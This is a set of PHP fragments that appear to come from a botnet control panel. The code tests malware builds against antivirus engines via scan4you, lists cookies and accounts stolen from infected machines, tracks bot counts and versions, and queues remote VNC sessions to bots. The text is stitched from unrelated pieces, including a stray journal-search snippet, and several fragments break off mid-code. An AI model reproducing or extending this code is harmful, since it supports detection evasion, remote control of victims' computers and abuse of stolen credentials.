/** Scan exe files under files/ using scan4you * @param int|null $id * File id for force scan * @param bool $html * Return HTML along with raw data * @cron if: return !empty($GLOBALS['config']['scan4you_id']) && !empty($GLOBALS['config']['scan4you_token']); * @cron period: 1d * @cron weight: 10 */ function cronjob_avirscan_files($id = null) { $jabber_notify = array(); $scan4you = new Scan4you($GLOBALS['config']['scan4you_id'], $GLOBALS['config']['scan4you_token']); if (!is_null($id)) { mysql_q(mkquery('UPDATE `exe_updates` SET `scan_date`=0 WHERE `id`={i:id};', array('id' => $id))); } $job_result = array(); $res = mysql_q(mkquery('SELECT `id`, `file`, `mtime` FROM `exe_updates` WHERE `scan_date` < {i:date};', array('date' => time() - 60 * 60 * 20))); while ($res && !is_bool($exe = mysql_fetch_assoc($res))) { $exe_path = 'files/' . $exe['file']; # scan $results = $scan4you->scan($exe_path); $job_result[$exe['file']] = array('threat' => count($results->scan_threat), 'okay' => count($results->scan_okay)); if (!is_null($results->error)) { $job_result[$exe['file']]['error'] = $results->error; } # store mysql_q(mkquery("UPDATE `exe_updates` SET `scan_date`=UNIX_TIMESTAMP(), `scan_threat` = {i:threat}, `scan_count`={i:count}, `scan_details`={s:details} WHERE `id`={i:id}", array('threat' => count($results->scan_threat), 'count' => count($results->scan_threat) + count($results->scan_okay), 'details' => $results->render_html('class="avirscan-results-map"'), 'id' => $exe['id']))); # notify if (count($results->scan_threat) >= 6) { $jabber_notify[] = sprintf("%s: %d Antiviruses detect it!\n\n%s\n", $exe['file'], count($results->scan_threat), $results->render_text()); } } # Jabber notify jabber_notify($GLOBALS['config']['scan4you_jid'], $jabber_notify); # Results return $job_result; }
/** Remove old scripts which are one-shot * @cron period: 1d */ function cronjob_cleanse_old() { mysql_q(mkquery('DELETE `botnet_scripts`, `botnet_scripts_stat` FROM `botnet_scripts` CROSS JOIN `botnet_scripts_stat` USING(`extern_id`) WHERE `botnet_scripts`.`flag_enabled`=0 AND `botnet_scripts`.`send_limit`=1 AND `botnet_scripts`.`time_created`<{i:time_thr} ', array('time_thr' => time() - 60 * 60 * 24 * 7))); return array('removed' => mysql_affected_rows()); }
} } header('Location: ' . QUERY_STRING_BLANK . 'reports_files&bots=' . urlencode(implode(' ', $blist)) . '&q='); die; } else { if (strcmp($ba, 'cookies') === 0) { require_once 'system/lib/db.php'; require_once 'system/lib/guiutil.php'; echo '<link rel="stylesheet" href="theme/style.css" />'; $found_n = 0; foreach (array_reverse(list_reports_tables(true)) as $yymmdd) { $R = mysql_q(mkquery('SELECT `id`, `rtime`, `path_source`, `context` FROM `botnet_reports_{=:yymmdd}` WHERE `bot_id` IN({s,:botId}) AND `type`={i:type} ORDER BY `rtime` DESC ', array('yymmdd' => $yymmdd, 'botId' => $blist, 'type' => BLT_COOKIES))); $n = mysql_num_rows($R); if (!$n) { continue; } $found_n += $n; echo '<table class="lined"><caption>', '20', implode('.', str_split($yymmdd, 2)), '</caption>'; echo '<TBODY>'; while (!is_bool($r = mysql_fetch_assoc($R))) { echo '<tr>', '<th>', timeago(time() - $r['path_source']), '</th>', '<td>', htmlspecialchars($r['path_source']), '</td>', '<td><pre>', htmlspecialchars($r['context']), '</td>', '</tr>'; } echo '</BODY></table>';
function getBotnetStats($botnet, $i) { $query1 = ''; $query2 = ''; if ($botnet != '') { $botnet = addslashes($botnet); $query1 = " WHERE `botnet`='{$botnet}'"; $query2 = " AND `botnet`='{$botnet}'"; } //Количетсво ботов, и время первого отчета. $tmp = htmlEntitiesEx(($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', "SELECT MIN(`rtime_first`), COUNT(`bot_id`), MIN(`bot_version`), MAX(`bot_version`) FROM `botnet_list`{$query1}"))) && $mt[0] > 0 ? gmdate(LNG_FORMAT_DT, $mt[0]) : '-'); $data = THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_FIRST_BOT), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $tmp), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, numberFormatAsInt($mt[1])), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END; $totalBots = $mt[1]; $minVersion = $mt[2]; $maxVersion = $mt[3]; //Количетсво ботов активных за последнии 24 часа. $tmp = ($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', 'SELECT COUNT(`bot_id`) FROM `botnet_list` WHERE `rtime_last`>=' . (CURRENT_TIME - 86400) . $query2))) ? $mt[0] : 0; $totalBots = '<a href="#" id="tr-botnet_activity">' . ($totalBots > 0 ? numberFormatAsFloat($tmp * 100 / $totalBots, 2) : 0) . '% - ' . numberFormatAsInt($tmp) . '</a>'; $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS24), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $totalBots), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END; $data .= '<tr><td id="botnet_activity" style="display: none;"> <h3>' . LNG_STATS_ACTIVITY . '</h3> <ul class="tabs"> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=7">' . LNG_STATS_ACTIVITY_7DAYS . '</a></li> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=14">' . LNG_STATS_ACTIVITY_14DAYS . '</a></li> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=30">' . LNG_STATS_ACTIVITY_30DAYS . '</a></li> </ul> <div class="display"> </div> </td></tr> '; //Максимальная и минимальная версия бота. $botVersions = intToVersion($minVersion) . ' — ' . intToVersion($maxVersion); $botVersions = '<a href="#" id="botVersions">' . $botVersions . '</a>'; $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_VERSIONS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $botVersions), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END; require_once "system/lib/db.php"; require_once "system/lib/guiutil.php"; $data .= jsonset(array('window.botVersions' => array())); foreach (array(0 => 0, 1 => time() - 60 * 60 * 24, 2 => time() - 60 * 60 * 24 * 7, 3 => time() - 60 * 60 * 24 * 31) as $id => $rtime_last) { $R = mysql_q(mkquery('SELECT `bot_version` AS `v`, COUNT(*) AS `n` FROM `botnet_list` WHERE `rtime_last` >= {i:rtime_last} GROUP BY `v` ORDER BY `n` DESC, `v` DESC ', array('rtime_last' => $rtime_last))); $versions = array(); while ($R && !is_bool($r = mysql_fetch_assoc($R))) { $versions[] = array(intToVersion($r['v']), (int) $r['n']); } $data .= jsonset(array('window.botVersions[' . $id . ']' => $versions)); } $ul = ''; $ul .= '<li><a href="#" data-id="0">' . LNG_STATS_TOTAL_VERSIONS_ALL . '</a>'; $ul .= '<li><a href="#" data-id="1">' . LNG_STATS_TOTAL_VERSIONS_DAY . '</a>'; $ul .= '<li><a href="#" data-id="2">' . LNG_STATS_TOTAL_VERSIONS_WEEK . '</a>'; $ul .= '<li><a href="#" data-id="3">' . LNG_STATS_TOTAL_VERSIONS_MONTH . '</a>'; $data .= <<<HTML <tr><td id="botVersions-td" style="display:none;"> \t\t<div id="botVersions-Display" class="clearfix"> \t\t\t<div class="pie"></div> \t\t\t<div class="table"></div> \t\t\t</div> \t\t<ul class="period"> \t\t\t{$ul} \t\t\t</ul> \t</td></tr> <script type="text/javascript" src="https://www.google.com/jsapi"></script> <script src="theme/js/page-stats_main.js"></script> HTML; return $data; }
/** Remove old, archived Jabber notifications * @cron period: 1d */ function cronjob_jabber_cleanse() { mysql_q(mkquery('DELETE FROM `jabber_messages` WHERE `sent`=1 AND `sent_time` < {i:old};', array('old' => time() - 60 * 60 * 24 * 10))); return array('cleansed' => mysql_affected_rows()); }
/** Find botId by IP */ function bot_ip2id($ip) { $d = array('ip_bin' => pack('N', ip2long($ip))); $R = mysql_query(mkquery('SELECT `bot_id` FROM `botnet_list` WHERE `ipv4`={s:ip_bin};', $d)); if (!$R || mysql_num_rows($R) == 0) { return null; } return array_shift(mysql_fetch_row($R)); }
break; case 'add_connect': # ?m=botnet_vnc&ajax=add_connect&bot=ID&protocol=VNC&autoconnect=0 $d = array('bot' => $_GET['bot'], 'protocol' => array_search($_GET['protocol'], $PROTOCOLS), 'do_connect' => $_GET['autoconnect'] ? -1 : 1); if (mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:bot}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $d))) { echo 'OK'; } else { echo 'MySQL error: ' . mysql_error(); } break; } die; } if (count($_POST)) { if (isset($_POST['connect'])) { mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:botid}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $_POST['connect'])); header('HTTP/1.1 301 Redirect'); header('Location: ?m=botnet_vnc'); die; } } ThemeBegin(LNG_THEME_TITLE, 0, getBotJsMenu('botmenu'), 0); echo '<table class="table_frame" id="switch-tabs"><tr><td>', '<ul>', '<li class="current"><a href="?m=botnet_vnc"><img src="images/vnc.png" />', LNG_MM_BOTNET_VNC, '</a></li>', '<li class="other" ><a href="?m=reports_accparse"><img src="images/drill.png" />', LNG_MM_REPORTS_ACCPARSE, '</a></li>', '</ul>', '</td></tr></table>'; # ==========[ ADD BOT ]========== # echo str_replace(array('{WIDTH}', '{COLUMNS_COUNT}', '{TEXT}'), array('100%', 1, LNG_CREATE_CONNECTION), THEME_LIST_BEGIN . THEME_LIST_TITLE), '<tr><td>'; if (empty($GLOBALS['config']['vnc_server'])) { echo '<div class="error">', LNG_NOT_CONFIGURED, '</div>'; } else { echo '<form method=POST>'; echo '<dl>'; echo '<dt>', LNG_CREATE_CONNECTION_BOTID, '</dt>', '<dd>', '<input type="text" name="connect[botid]" value="" size="100"/>', '</dd>';
><span>References</span></label></div> <div><select name="sec" id="ignore"> <option selected>All sections</option> <?php foreach ($subj as $k => $v) { $sel = $sec && $sec === $k ? ' selected' : ''; echo '<option value="' . $k . '"' . $sel . '>' . $v . '</option>'; } ?> </select></div> <div><button class="btn btn-green">Search</button></div> </form> </div> <?php } $res = $mysqli->query(mkquery($query)); while ($row = $res->fetch_assoc()) { $arc[$row['vol']][$row['issue']][] = $row; $totrow++; } /*echo '<pre>'; print_r($arc); echo '</pre>';*/ if (isset($arc)) { $cursec = ''; if ($xtra) { echo plural($totrow, 'result'); } foreach ($arc as $vol => $issue) { $year = J_YEAR + $vol; $cur = current($issue);
} echo '</TBODY>'; echo '</table>'; break; # List accounts of a rule|bot # List accounts of a rule|bot case 'accs': # The Input $where = '1=1'; if (!empty($_GET['rule'])) { $where .= ' AND `a`.`rule_id`={i:rule}'; } if (!empty($_GET['bot'])) { $where .= ' AND `a`.`bot_id`={s:bot}'; } $where = mkquery($where, $_GET); $_GET['online'] = isset($_GET['online']) ? (int) $_GET['online'] : 0; # The Query $R = mysql_query($q = <<<SQL t\tSELECT t\t\t`r`.`id` AS `rule_id`, t\t\t`r`.`alias` AS `rule_alias`, t\t\t`r`.`enabled` AS `rule_enabled`, t\t\t`a`.`bot_id` AS `bot_id`, t\t\t`a`.`bot_info` AS `bot_info`, t\t\t`a`.`id` AS `acc_id`, t\t\t`a`.`account` AS `account`, t\t\t`a`.`mtime` AS `acc_mtime`, t\t\t`a`.`favorite` AS `acc_favorite`, t\t\t`a`.`notes` AS `acc_notes`, t\t\t`b`.`os_version` AS `bot_os`,